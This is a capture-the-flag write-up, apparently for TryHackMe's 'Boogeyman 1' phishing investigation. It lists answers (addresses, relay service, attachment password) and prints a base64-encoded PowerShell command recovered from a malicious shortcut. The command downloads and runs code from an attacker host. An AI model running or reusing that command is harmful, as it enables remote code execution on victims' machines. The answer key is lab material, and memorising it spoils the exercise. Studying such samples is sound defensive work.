Mampuru/Cyber-WriteUps/Boogeyman_1 _[THM].md

 Answer the questions below
 1. What is the email address used to send the phishing email?
+- *agriffin@bpakcaging.xyz*

 2. What is the email address of the victim?
+- *julianne.westcott@hotmail.com*

 3. What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
+- We can copy the content of the email header and use online tool to analyze the content.
+Here I used https://mha.azurewebsites.net/
+- *elasticemail*

 4. What is the name of the file inside the encrypted attachment?
+- *Invoice_20230103.lnk*

 5. What is the password of the encrypted attachment?
+- *Invoice2023!*

 6. Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
+- Parse the the malicious file using the tool mentioned.
+- `Inkparse Invoice_20230103.lnk`
+- Decode the strings in cyberchef.
+- *aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==*

 ## Task 3: [Endpoint Security] Are you sure that’s an invoice? ##